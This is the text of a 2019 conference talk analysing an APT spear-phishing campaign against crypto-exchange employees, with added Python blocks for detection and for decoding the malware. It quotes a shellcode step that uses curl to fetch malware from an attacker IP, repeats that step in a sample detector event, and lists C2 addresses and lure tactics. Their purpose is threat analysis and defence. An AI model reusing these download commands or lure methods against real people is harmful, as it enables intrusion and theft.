CODE BLUE
2019 @TOKYO
Heungsoo Kang, LINE
DISCRETION IN APT

Recent attack on crypto exchange services
$ whoami
- Heungsoo Kang (David)
- LINE
- Mobile messenger loved in Asia
- Lots of services
- Also a crypto/fiat exchange: BITBOX / BITMAX
- We care about security very much!
- Contact
- cmpdebugger@gmail.com / @jz__
About this talk
- Background
- Coinbase announced it had been hit by a very sophisticated, highly targeted attack
- Coinbase blog / Philip Martin (@SecurityGuyPhil)
- Decent analysis by objective-see.com
- Undisclosed, but LINE was also targeted
About this talk
- Goal of this talk
- To share the perspectives of …
- The victim (how it looked like to him)
- The attackers (what they had prepared)
- The blue-team (what we could/not see)
- To share information about …
- Its malware
- Attackers
Perspective 1: Victim
How it looked over the surface
About Victim
- A talented developer
- ~10 years of experience
- Devices
- iPhone
- MacBook Pro
Email Conversation
- Victim receives an email through his personal account
- Sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
- Passed SPF/DKIM/DMARC
- Link uses legit cam.ac.uk
- Adams Prize is “Looking for field experts”
- LinkedIn profile
Email Conversation
- LinkedIn Profile
- 100+ connections
- Nice fit to the story
Email Conversation
- Victim carries on the conversation with the attacker without any suspicion
Email Conversation
- Victim gets the exploit link, ID and temporary PW
Web Browsing
- Victim visits the URL … and sees a warning: “Firefox only”
- The warning refers to the official Firefox page
- With Firefox, the web page shows up
Exploit
- Firefox downloads the exploit JavaScript
- Shellcode uses curl http://x.x.x.x/malw so it doesn’t trigger macOS Gatekeeper
- The attack was stopped here
- Detected, suspended & killed
- Red flag raised from various indicators + in-house tools
Response
- Victim gets interrogated… just kidding.
- Victim gets interviewed and helps the security team get the picture
- Security team follows up and prepares additional tracking
- Stage 1 sends system information, then downloads the stage 2 malware
- Stage 1 - macos.netwire variant
- Stage 2 - macos.mokes variant
Perspective 2: Attackers
What lies beneath
Prepare Weapons
- Prepare weaponized exploits
- Firefox code execution (CVE-2019-11707)
- Firefox sandbox escape (CVE-2019-11708)
Prepare Weapons
- Prepare malware
- Stage 1 - Report victim information
- Scout. Small, new, low detection
- Stage 2
- Full Remote Administration Tool (RAT)
Prepare Infra
- Prepare servers
- C2
- Stage 1 - 89.34.111.113 (qhoster.com, Uruguay)
- Stage 2 - 185.49.69.210 (leaseweb.com, UK)
- Stage 2 - 142.93.110.250 (digitalocean.com, US)
- Host malware
- 185.162.131.96 (king-servers.com, Russia)
- Host exploit
- 54.38.93.182 (ovh.com, France)
- Buy domain analyticsfit.com
- Payment for the servers
- Credit card, PayPal, BTC, ZCash, Monero, etc.
Hack Accounts
- Hack accounts for the attack
- At least 2 accounts from cam.ac.uk hacked
- nm603@, grh37@, ...
Hack Accounts
- How the accounts were hacked is undisclosed
- Phishing of individuals?
- Credential stuffing? (using leaked ID/password pairs)
- Brute force?
- DB compromise?
Hack Accounts
- The University has a bold service, useful for OSINT
- Anyone can list accounts
- http://jackdaw.cam.ac.uk/mailsearch/
- Email account search service
- Useful for everyone (students, and…)
University Accounts
- Services for the account owners:
- Email address: nm603@cam.ac.uk
- Personal web hosting
- hxxp://people.ds.cam.ac.uk/nm603
- Makes it all look authentic
Prepare Website
- Prepare web pages on people.ds.cam.ac.uk
- Fake University site
- Add simple JavaScript for social engineering
- “Please use Firefox …”
- Load exploit
Script on Fake Website
- if (macos && not firefox) then show “use Firefox” message
- if (macos && firefox) or (not macos) then load /script.js
- So people.ds.cam.ac.uk/script.js must be the exploit!
→ No.
- (Actual packet capture of the victim at the time of the attack)
- The actual exploit code was loaded at the end of the HTML
- Made to look like Google’s analytics.js
- All websites have one at the end
- HTTPS
Prepare John Doe
- The accounts they hacked are [nm603, grh37]
- Make up names accordingly: Neil Morris, Gregory Harris
- Join LinkedIn, make the profile fit the storyline (university staff)
- Add connections, 100++
- How we all love to accept random requests
- Write a nice email signature
- Add links to website, LinkedIn
Start Operation
- Set targets - look for cryptocurrency exchange employees
- Start by opening a conversation through email
- Evaluate targets through the conversation
- Select targets related to cryptocurrency exchanges
- Guide ONLY selected targets to the exploit page
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d) - another case
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-phished/
- Review of how he “almost” got hacked by this campaign
- Author communicated via email with grh37@cam.ac.uk
- He was not guided to the final exploit page
- Initially selected as a target, but evaluated out.
Operation: Goal
- Initial exploit → run stage 1 malware
- Stage 1 malware reports information about the victim
- Stage 1 malware downloads stage 2 malware (full RAT)
- Go for profit!! $$
Perspective 3: Blue Team
What can we see? Challenges?
Blue Team Downsides
- Cliché, yes
- Too much stuff to watch
- Employees from many countries
- Huge infrastructure
- Countless servers (we run our own AWS-like private cloud, “Verda”)
Blue Team Weapons
- From infrastructure
- Network-based defense/detection methods
- Network visibility solutions to see inside HTTPS connections
- From endpoint
- Endpoint Detection & Response / Antivirus
- Patch management system
- Various monitoring solutions, etc.
Blue Team Weapons
- Honeypots, sandboxes
- Indicators of Compromise service
- Network segregation / air-gapping
- Authentication, 2FA
- Desktop virtualization
- More & more…
→ Usable security: must not get in the way of productivity
Pain Point for Blue Team
- Attackers sent the email to the victim’s personal Gmail account
- Legit cam.ac.uk email + website
- HTTPS + encrypted communication
- Low detection (Stage 1 = 1, Stage 2 = 0 detections on VirusTotal)
- Encrypted, non-HTTPS protocol for the C2 connection on port 443
- Diverse use of servers (exploit, malware download, C2, etc.)
- Stage 2 downloaded outside of the corp network to avoid detection
Breadcrumbs for Blue Team
- Shellcode → curl → Mach-O (executable) download
- Communication to suspicious IP addresses (C2)
- Unknown new executable files
- Security team had the resources to analyze & follow up
- Plus other undisclosable indicators & methods
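The breadcrumbs above, together with the pain points on the previous slide (an encrypted but non-TLS C2 channel on port 443, connections to known C2 addresses), can be turned into a small triage pass over endpoint and network telemetry. The Python below is an added example and not LINE’s in-house tooling: the event format, the field names and the sample events are constructed here, 203.0.113.5 is a documentation address standing in for the x.x.x.x on the Exploit slide, and the C2/hosting addresses are the ones listed on the Prepare Infra slide. The curl step matters for Gatekeeper because curl, unlike a browser download, does not set the com.apple.quarantine attribute, so a Mach-O it writes is not assessed at launch.

```python
import ipaddress
import re

# C2 and hosting addresses listed on the Prepare Infra / Stage 1 / Stage 2 slides
KNOWN_BAD_IPS = {
    "89.34.111.113",    # stage 1 C2
    "185.49.69.210",    # stage 2 C2
    "142.93.110.250",   # stage 2 C2
    "185.162.131.96",   # malware hosting
    "54.38.93.182",     # exploit hosting
}

# Mach-O magics (64/32-bit, both byte orders) plus the fat/universal header
MACHO_MAGICS = {b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf",
                b"\xce\xfa\xed\xfe", b"\xfe\xed\xfa\xce", b"\xca\xfe\xba\xbe"}


def is_bare_ip_url(url):
    """True for http(s)://<ip>/... URLs, the pattern used by the shellcode's curl."""
    m = re.match(r"https?://([^/:]+)", url)
    if not m:
        return False
    try:
        ipaddress.ip_address(m.group(1))
        return True
    except ValueError:
        return False


def looks_like_tls_client_hello(first_bytes):
    """TLS record header: content type 0x16 (handshake), version 0x03 0x00..0x04."""
    return (len(first_bytes) >= 3 and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03 and first_bytes[2] <= 0x04)


def triage(events):
    """Walk events in order and return (rule, detail) alerts."""
    alerts = []
    curl_outputs = {}  # path written by a curl-from-bare-IP -> the curl event
    for ev in events:
        if ev["type"] == "process" and ev["image"].endswith("/curl"):
            args = ev["args"]
            url = next((a for a in args if a.startswith("http")), None)
            out = args[args.index("-o") + 1] if "-o" in args else None
            if url and is_bare_ip_url(url):
                alerts.append(("curl-from-bare-ip", url))
                if out:
                    curl_outputs[out] = ev
        elif ev["type"] == "file_write":
            # file_write events carry the first bytes of the written file (assumed field)
            if ev["path"] in curl_outputs and ev["magic"] in MACHO_MAGICS:
                alerts.append(("macho-written-by-curl", ev["path"]))
        elif ev["type"] == "process" and ev["image"] in curl_outputs:
            alerts.append(("curl-download-executed", ev["image"]))
        elif ev["type"] == "network":
            if ev["dst"] in KNOWN_BAD_IPS:
                alerts.append(("known-c2", ev["dst"]))
            if ev["dport"] == 443 and not looks_like_tls_client_hello(ev["first_bytes"]):
                alerts.append(("non-tls-on-443", ev["dst"]))
    return alerts


# Constructed sample telemetry (not a real capture). 198.51.100.7 is a benign
# documentation address used as the control case.
SAMPLE_EVENTS = [
    {"type": "process", "image": "/usr/bin/curl",
     "args": ["curl", "http://203.0.113.5/malw", "-o", "/tmp/IconServicesAgent"]},
    {"type": "file_write", "path": "/tmp/IconServicesAgent", "magic": b"\xcf\xfa\xed\xfe"},
    {"type": "process", "image": "/tmp/IconServicesAgent", "args": ["/tmp/IconServicesAgent"]},
    {"type": "network", "dst": "89.34.111.113", "dport": 443, "first_bytes": b"\x8a\x11\x00\x10"},
    {"type": "network", "dst": "198.51.100.7", "dport": 443, "first_bytes": b"\x16\x03\x01\x02\x00"},
]


def run_sample():
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_sample():
        print(f"{rule:24} {detail}")
```

The ordering of the rules mirrors the kill chain on the slide: a bare-IP curl alone is noisy, but a Mach-O written by that curl and then executed, followed by non-TLS traffic to port 443, is the chain the security team actually saw.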
Malware Information
Stage 1 & 2
Stage 1 - Overview
- NETWIRE
- Commercial administration tool
- Agent builder
Stage 1 - Overview
- Hash
- MD5 - de3a8b1e149312dac5b8584a33c3f3c6
- SHA256 - 07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4
- Downloaded from
- hxxp://185.162.131.96/i/IconServicesAgent
- C2 Server
- 89.34.111.113 - port closed
- Binary is not signed
Stage 1 - NETWIRE
- C2 Protocol
- https://github.com/pan-unit42/public_tools/blob/master/netwire/commands.json
- XOR command with 0xe3
- C2 command handler function at 0x4109
- Report user/host information
- Report user external IP
- List processes
- Start shell
- Search / Write / Execute file
- Heartbeat (I’m alive)
- Persistence - “Don’t want to die”
- Adds itself to the signal handler
- Downloads stage 2
- Shell executed after downloading … left a shell history file
Stage 1 - string “hyd7u5jdi8”
- Unique string found -> RC4 key
- This NETWIRE binary contains 4 RC4 keys in total.
- Key string “hyd7u5jdi8” is used only once, for decrypting “%Rand%”
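The two facts on the NETWIRE slides above (C2 commands XORed with 0xe3; configuration strings RC4-encrypted, with “hyd7u5jdi8” decrypting “%Rand%”) are enough to write the small decoding helpers an analyst keeps next to the sample. The Python below is an added example, not code from the talk or from the Unit 42 repository it links: the RC4 routine is the standard algorithm, the sample blob and its key/length/ciphertext layout are constructed here, and applying the XOR to every byte of the command field is this example’s assumption (the slide states only that the command is XORed with 0xe3). The RC4 self-check uses the published test vectors so that a broken implementation fails before it is pointed at real data.

```python
# Observations from the slides: C2 command bytes are XORed with 0xe3 and the
# configuration strings are RC4-encrypted; "hyd7u5jdi8" decrypts "%Rand%".
XOR_KEY = 0xE3
HYDSEVEN_KEY = b"hyd7u5jdi8"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_self_test() -> bool:
    """Published RC4 test vectors; run before trusting any decrypted output."""
    return (rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
            and rc4(b"Wiki", b"pedia").hex() == "1021bf0420")


def xor_command(buf: bytes) -> bytes:
    """Apply the 0xe3 XOR to a command buffer; the operation is its own inverse.
    Applying it to every byte of the field is this example's assumption."""
    return bytes(b ^ XOR_KEY for b in buf)


def find_key_string(blob: bytes, key: bytes = HYDSEVEN_KEY) -> int:
    """YARA-style check for the key string that gave the group its name; -1 if absent."""
    return blob.find(key)


def decrypt_after_key(blob: bytes, key: bytes = HYDSEVEN_KEY):
    """Locate the key in a blob and RC4-decrypt the length-prefixed field after it.
    The (key, 1-byte length, ciphertext) layout is constructed for this example."""
    off = find_key_string(blob, key)
    if off < 0:
        return None
    n = blob[off + len(key)]
    start = off + len(key) + 1
    return rc4(key, blob[start:start + n])


# Constructed sample blob (not bytes from the real binary): padding, the key in clear,
# then the length-prefixed RC4 ciphertext of "%Rand%" under that key.
SAMPLE_BLOB = (b"\x90" * 16
               + HYDSEVEN_KEY
               + bytes([6]) + rc4(HYDSEVEN_KEY, b"%Rand%"))


if __name__ == "__main__":
    assert rc4_self_test()
    print("key at offset", find_key_string(SAMPLE_BLOB))
    print("decrypted:", decrypt_after_key(SAMPLE_BLOB))
    print("command 0x00 on the wire:", xor_command(b"\x00").hex())
```

Because RC4 is symmetric, the same `rc4` call that recovers the configuration string also re-encrypts it, which is convenient when comparing the variants listed on the next slides: the code is identical and only the RC4-encrypted data differs.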
Stage 1 - variants
- hxxp://185.162.131.96 (download server) is still up (Apache)
- Brute-forced the server’s directory: found some variants
- hxxp://185.162.131.96/i/195/195
- hxxp://185.162.131.96/i/kr
- hxxp://185.162.131.96/i/kri
- hxxp://185.162.131.96/i/pm
- hxxp://185.162.131.96/i/pmi
- hxxp://185.162.131.96/i/thk
- Same code, different data (encrypted with different RC4 keys)
- But all contain the same key “hyd7u5jdi8”
Stage 1 - variants
- hxxp://185.162.131.96/i/IconServicesAgent de3a8b1e149312dac5b8584a33c3f3c6
- hxxp://185.162.131.96/i/195/195 b6f92b20816f23c147445bd5eec86a06
- hxxp://185.162.131.96/i/kr 8b2b7537c792ecf24d8ee7b9fbb942f8
- hxxp://185.162.131.96/i/kri 5030422b3428c0f938e3ad03720ca9e8
- hxxp://185.162.131.96/i/pm 70286abc22eca9a9cbea24e551c891cd
- hxxp://185.162.131.96/i/pmi de3a8b1e149312dac5b8584a33c3f3c6
- hxxp://185.162.131.96/i/thk fc99b1407655674573ee4167f1e3dcbd
Stage 1 - variants
- Uploaded to VT - https://tinyurl.com/brutedown
- Downloadable here - https://tinyurl.com/brutedown2
Stage 2 - Overview
- Hash
- MD5 - af10aad603fe227ca27077b83b26543b
- SHA256 - 97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad
- Downloaded by stage 1
Stage 2 - Overview
- macos.Mokes
- Remote administration tool
- C2 Server
- 185.49.69.210 port 443|80 (closed)
- athlon4free2updates1.com / 142.93.110.250
- Alive but not sending payload
- Certificate invalid
Stage 2 - Overview
- Built with Qt - huge binary size (13MB)
- FLIRT signatures for Qt versions, OpenSSL - only 20% identified
- Also not signed
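Both stage 1 and stage 2 are described above as unsigned Mach-O binaries. The Python below, added here rather than taken from the talk, walks the load commands of a 64-bit Mach-O and reports whether an LC_CODE_SIGNATURE command is present; the two inputs are minimal headers constructed inline, not the real samples. Presence of the command only means a signature blob exists (it may be ad hoc or from an untrusted identity), so this is a triage hint for the “unknown new executable” breadcrumb; `codesign -dv --verbose` and `spctl --assess` do the actual verification, and a universal (fat) binary has to be sliced per architecture first.

```python
import struct

MH_MAGIC_64 = 0xFEEDFACF
MH_CIGAM_64 = 0xCFFAEDFE      # same magic, byte-swapped
LC_UUID = 0x1B
LC_CODE_SIGNATURE = 0x1D
CPU_TYPE_X86_64 = 0x01000007
MH_EXECUTE = 2


def macho_load_commands(data: bytes):
    """Return [(cmd, cmdsize), ...] for a 64-bit Mach-O, with bounds checks so a
    truncated or crafted header raises instead of reading out of range."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic == MH_MAGIC_64:
        end = "<"
    elif magic == MH_CIGAM_64:
        end = ">"
    else:
        raise ValueError("not a 64-bit Mach-O (fat binaries must be sliced first)")
    # mach_header_64: magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
    ncmds, sizeofcmds = struct.unpack_from(end + "II", data, 16)
    off = 32
    cmds = []
    for _ in range(ncmds):
        if off + 8 > len(data):
            raise ValueError("truncated load commands")
        cmd, cmdsize = struct.unpack_from(end + "II", data, off)
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("bad cmdsize")
        cmds.append((cmd, cmdsize))
        off += cmdsize
    if off - 32 != sizeofcmds:
        raise ValueError("sizeofcmds does not match the load commands walked")
    return cmds


def has_code_signature(data: bytes) -> bool:
    """True if any load command is LC_CODE_SIGNATURE (a signature blob exists)."""
    return any(cmd == LC_CODE_SIGNATURE for cmd, _ in macho_load_commands(data))


def build_sample(signed: bool) -> bytes:
    """Constructed minimal Mach-O header: one LC_UUID, optionally an LC_CODE_SIGNATURE.
    Not a real executable; just enough structure for the load-command walk."""
    cmds = struct.pack("<II", LC_UUID, 24) + b"\x11" * 16          # uuid_command
    if signed:
        # linkedit_data_command: cmd, cmdsize, dataoff, datasize (values are placeholders)
        cmds += struct.pack("<IIII", LC_CODE_SIGNATURE, 16, 0x1000, 0x200)
    ncmds = 2 if signed else 1
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, CPU_TYPE_X86_64, 0,
                         MH_EXECUTE, ncmds, len(cmds), 0, 0)
    return header + cmds


if __name__ == "__main__":
    for label, blob in (("signed-sample", build_sample(True)),
                        ("unsigned-sample", build_sample(False))):
        print(f"{label}: code signature present = {has_code_signature(blob)}")
```

Pointed at real files, the same walk also surfaces the other things the slides mention in passing: a 13MB Qt binary shows up as a long list of large LC_SEGMENT_64 commands, and the absence of LC_CODE_SIGNATURE on a freshly written Mach-O is exactly what an endpoint sensor can flag cheaply, before any disassembly.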
Stage 2
- Copies itself under one of these names, chosen at random
- Persistence
- Hides the application from the macOS Dock
- Searches for files - AutoFileSearchTask::files_to_search
More About Campaign
Connecting the dots on their “work habits”
Previous Analysis
- Name
- Only recently referred to as “HydSeven”, after the Coincheck attack
- From the RC4 key string “hyd7u5jdi8”
- History
- Known for attacking banks and undisclosed financial businesses
- Introduced in FireEye Trend (2017)
- https://tinyurl.com/firetrend
- Nice overview by mertsarica.com (2017)
- https://tinyurl.com/1mertsa
- https://tinyurl.com/2mertsa
- Attack analysis by Exatel (2016)
- https://tinyurl.com/1exatel
- Analysis of the Coincheck hack by LAC Watch (2019)
- https://tinyurl.com/lac-coincheck
Initial Compromise
- Based on spear phishing
- Office document with macro
- Office 1-day exploit (EPS)
- WinRAR 1-day exploit (ACE path)
- 0-day exploit (Firefox)
Favorite Method
- Hacked London School of Economics account
- Use the account for email communication
- “We need an expert like you as jury for the ‘Banker Awards’”
- Abuse the university’s web hosting for phishing
[https://tinyurl.com/1mertsa]
Favorite Method
- Not afraid of making conference calls with victims
[https://tinyurl.com/2mertsa]
Favorite Method
- Abuse LinkedIn accounts
- Impersonate someone with the same/similar name
[https://tinyurl.com/1mertsa]
Favorite Method
- Hacked Angelina College
[https://tinyurl.com/firetrend]
Favorite VPS
- This attack: OVH, LeaseWeb, King-Servers, QHoster
- Previous campaigns
- OVH x 6
- LeaseWeb x 6
- King-Servers x 1
- QHoster x 1
- Etc. (Vultr, netsec.com, HostSailor, etc.)
But…
- Why him?
- Attack on 1 employee
- After the exchange? After the individual?
Conclusion - Attackers
- Decent social engineering
- Use of compromised university accounts (email/site)
- Responsive communication
- Use of 0-day/n-day exploits - or just Office + macro
- Malware
- NETWIRE/MOKES
- Platform-independent source code (Windows, macOS, Linux)
- Manage to keep AV detection low
- Use digital certificates for Windows binaries
- Active
- Skilled operators
Conclusion - Countermeasure
Minimize the risk while maintaining usable security
- User education: awareness of spear-phishing
- Defense in depth: block SOMEWHERE in the middle, block SOMETIME in the middle
- Detections & sensors: EPP (AV), network monitoring, honeypots, IoC, human resources
Questions?
- Contact
- cmpdebugger@gmail.com
- @jz__
- id: heungsookang

Social Engineering and other Foes in the GDPR Year
 
Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPF
 
Cybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryCybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industry
 
Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity
 
Creating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email CompromiseCreating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email Compromise
 
INSECURE Magazine - 33
INSECURE Magazine - 33INSECURE Magazine - 33
INSECURE Magazine - 33
 
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloadedDefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloaded
 
Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019
 
Technology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptxTechnology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptx
 
Technically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliantTechnically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliant
 
Hacking TYPO3 v9
Hacking TYPO3 v9Hacking TYPO3 v9
Hacking TYPO3 v9
 
Breakfast Briefings - February 2018
Breakfast Briefings - February 2018Breakfast Briefings - February 2018
Breakfast Briefings - February 2018
 
CyberDen 2020
CyberDen 2020CyberDen 2020
CyberDen 2020
 

Plus de CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

Plus de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
